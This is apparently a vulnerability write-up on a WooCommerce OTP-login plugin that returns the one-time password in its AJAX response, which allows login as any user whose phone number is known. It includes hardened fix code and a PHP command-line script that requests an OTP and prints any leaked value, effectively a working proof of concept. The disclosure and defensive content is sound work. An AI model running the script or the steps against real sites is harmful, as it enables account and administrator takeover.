The plugin was affected by an authentication bypass vulnerability. To log in as any user, we only need to know that user’s phone number: the one-time password meant for their phone is handed back to us in the server’s response. If the phone number belongs to an administrator, we obtain an administrator account on the website.


Let’s check the plugin

The request_otp() method in the Xoo_Ml_Phone_Verification class generates and sends an OTP with the following code:

$otp = Xoo_Ml_Otp_Handler::sendOTPSMS( $phone_code, $phone_no );

but the OTP is also included in the array that is returned as the AJAX response:

	'otp_sent' 	=> 1,
	'otp' 		=> $otp,
	'phone' 	=> $phone_code.$phone_no,
	'phone_no' 	=> $phone_no,
	'phone_code'=> $phone_code,
	'error' 	=> 0,
	'otp_txt' 	=> sprintf( __( 'Please enter the OTP sent to <br> %s', 'mobile-login-woocommerce' ), $phone_code.$phone_no ),

The problem is that the one-time password, which should reach the user only via SMS, is disclosed to whoever made the request. Anyone who can trigger the OTP request for a phone number receives the OTP for that number, so the second factor protects nothing.
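The corrected shape of this handler, as an added example that is not the plugin’s code: the response array drops the 'otp' key, the server keeps only a salted hash of the OTP with a short expiry, and verification compares in constant time with an attempt limit. It is written against the WordPress API (set_transient(), wp_hash(), hash_equals()), so it runs inside WordPress rather than stand-alone; the example_ function names, the 'example_otp_' transient key prefix and the $send callable standing in for the plugin’s sendOTPSMS() are assumptions.

```php
<?php
// Added example, not the plugin's code. Runs inside WordPress (uses transients
// and wp_hash()). Names prefixed example_ and the 'example_otp_' transient key
// are hypothetical.

// What the page describes: the generated OTP is echoed back to the requester.
function example_vulnerable_response( $otp, $phone_code, $phone_no ) {
    return array(
        'otp_sent' => 1,
        'otp'      => $otp,                      // the secret, visible to anyone who asked
        'phone'    => $phone_code . $phone_no,
        'error'    => 0,
    );
}

function example_otp_key( $phone_code, $phone_no ) {
    return 'example_otp_' . md5( $phone_code . $phone_no );
}

// Hardened request: generate, store only a keyed hash with a short lifetime,
// deliver by SMS, and return nothing the browser must not know.
// $send stands in for Xoo_Ml_Otp_Handler::sendOTPSMS() and receives the OTP.
function example_hardened_request_otp( $phone_code, $phone_no, callable $send ) {
    $otp    = sprintf( '%06d', random_int( 0, 999999 ) );   // CSPRNG, fixed width
    $record = array(
        // Binding the phone number into the hash stops an OTP issued for one
        // number from being replayed against another. wp_hash() uses the site salts.
        'hash'     => wp_hash( $phone_code . $phone_no . ':' . $otp ),
        'expires'  => time() + 5 * MINUTE_IN_SECONDS,
        'attempts' => 0,
    );
    set_transient( example_otp_key( $phone_code, $phone_no ), $record, 5 * MINUTE_IN_SECONDS );

    $send( $phone_code, $phone_no, $otp );

    return array(                                // safe to pass to wp_send_json()
        'otp_sent'   => 1,
        'phone'      => $phone_code . $phone_no,
        'phone_no'   => $phone_no,
        'phone_code' => $phone_code,
        'error'      => 0,
        'otp_txt'    => sprintf( __( 'Please enter the OTP sent to <br> %s', 'mobile-login-woocommerce' ), $phone_code . $phone_no ),
    );
}

// Verification: expiry and attempt limit are enforced server-side, the compare
// is constant-time, and the record is consumed on success so the OTP is single-use.
function example_hardened_verify_otp( $phone_code, $phone_no, $submitted ) {
    $key    = example_otp_key( $phone_code, $phone_no );
    $record = get_transient( $key );

    if ( ! is_array( $record ) || time() > $record['expires'] || $record['attempts'] >= 5 ) {
        delete_transient( $key );                // expired, never issued, or brute-forced
        return false;
    }

    $record['attempts']++;
    set_transient( $key, $record, max( 1, $record['expires'] - time() ) );

    $ok = hash_equals( $record['hash'], wp_hash( $phone_code . $phone_no . ':' . (string) $submitted ) );
    if ( $ok ) {
        delete_transient( $key );
    }
    return $ok;
}
```

The hooking does not change: the AJAX callback builds its array with example_hardened_request_otp() and passes it to wp_send_json(), and the login callback calls example_hardened_verify_otp() before wp_set_auth_cookie(). The attempt limit is not optional once the OTP stays on the server: a six-digit code with unlimited tries is still guessable in at most a million requests.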


Let’s configure the plugin

The vulnerability is only present when the Phone Operator is set to Amazon or Twilio.

In the plugin settings, under the Phone tab, select “Amazon” for the “Phone Operator”. Then, under the Services tab, in the Amazon SNS Settings, enter the “Access key” and “Secret access key”.

Then, in the target user’s profile, the “Phone” field must be set.

These settings are required for OTP login to work at all; they are the plugin’s normal configuration, not part of the attack.


Let’s see how we can exploit this vulnerability

All we have to do is request an OTP for the target’s phone number and read the response; the easiest way is the Network tab of the browser’s developer console.

Screenshot: OTP Login/Signup Woocommerce – Login with OTP at WooCommerce

Screenshot: OTP Login/Signup Woocommerce – Enter OTP, and the password in the response

As we can see in the screenshot, the OTP is included in the JSON response:

{"error":0,"otp":461129,"otp_sent":1,"otp_txt":"Please enter the OTP sent to <br> +3630xxxxxxx","phone":"+3630xxxxxxx","phone_code":"+36","phone_no":"30xxxxxxx"}

If we enter this value in the “Enter OTP” field and click the Login with OTP button, we are logged in as that user, without ever having had access to their phone.
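The same check from the command line, as an added example that is not part of the original post: it sends the OTP request the login form sends to wp-admin/admin-ajax.php and reports whether the JSON answer carries an otp field. The AJAX action name and the request parameter names (action, phone_code, phone_no) are assumptions: copy them from the request you see in the browser console, not from this script.

```php
<?php
// Added example, not from the original post: a CLI check for the leak described
// above. The 'action', 'phone_code' and 'phone_no' parameter names are assumptions;
// take the real ones from the request shown in the browser console.
//
// Usage: php otp_leak_check.php https://shop.example/ <ajax_action> +36 30xxxxxxx

function otp_leak_check( $site, $action, $phone_code, $phone_no ) {
    $url  = rtrim( $site, '/' ) . '/wp-admin/admin-ajax.php';
    $body = http_build_query( array(
        'action'     => $action,
        'phone_code' => $phone_code,
        'phone_no'   => $phone_no,
    ) );
    $ctx = stream_context_create( array( 'http' => array(
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => $body,
        'ignore_errors' => true,    // keep the body of non-2xx responses as well
        'timeout'       => 15,
    ) ) );
    $raw = file_get_contents( $url, false, $ctx );
    if ( false === $raw ) {
        return array( 'ok' => false, 'reason' => 'request failed' );
    }
    return otp_leak_inspect( $raw );
}

// Decision logic kept separate so it can be run against a saved response body.
function otp_leak_inspect( $raw ) {
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        return array( 'ok' => false, 'reason' => 'response is not JSON', 'raw' => $raw );
    }
    if ( isset( $data['otp'] ) && '' !== (string) $data['otp'] ) {
        return array( 'ok' => true, 'leaked' => true, 'otp' => (string) $data['otp'] );
    }
    if ( ! empty( $data['otp_sent'] ) ) {
        return array( 'ok' => true, 'leaked' => false );   // OTP was sent, nothing echoed back
    }
    return array( 'ok' => false, 'reason' => 'no otp_sent in response', 'raw' => $raw );
}

if ( PHP_SAPI === 'cli' && isset( $argv ) && basename( __FILE__ ) === basename( $argv[0] ) ) {
    if ( $argc < 5 ) {
        fwrite( STDERR, "usage: php {$argv[0]} <site> <ajax_action> <phone_code> <phone_no>\n" );
        exit( 2 );
    }
    $result = otp_leak_check( $argv[1], $argv[2], $argv[3], $argv[4] );
    if ( ! empty( $result['leaked'] ) ) {
        echo "VULNERABLE: OTP {$result['otp']} returned in the AJAX response\n";
        exit( 1 );
    }
    echo $result['ok'] ? "OK: otp_sent without an otp field\n" : "INCONCLUSIVE: {$result['reason']}\n";
}
```

Every run of this check sends a real SMS to the phone number given, exactly as the login form does, so use a number you control. An INCONCLUSIVE result usually means the action or parameter names were wrong, not that the site is fixed.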



As the next screenshot shows, the same OTP arrived from the service provider via SMS, confirming that the value in the response is the real one-time password:

Screenshot: OTP Login/Signup Woocommerce – SMS from the provider


Try it

Feel free to try it out on the WordPress test websites. I have set the roles and capabilities so that you can only get low-level access to the website.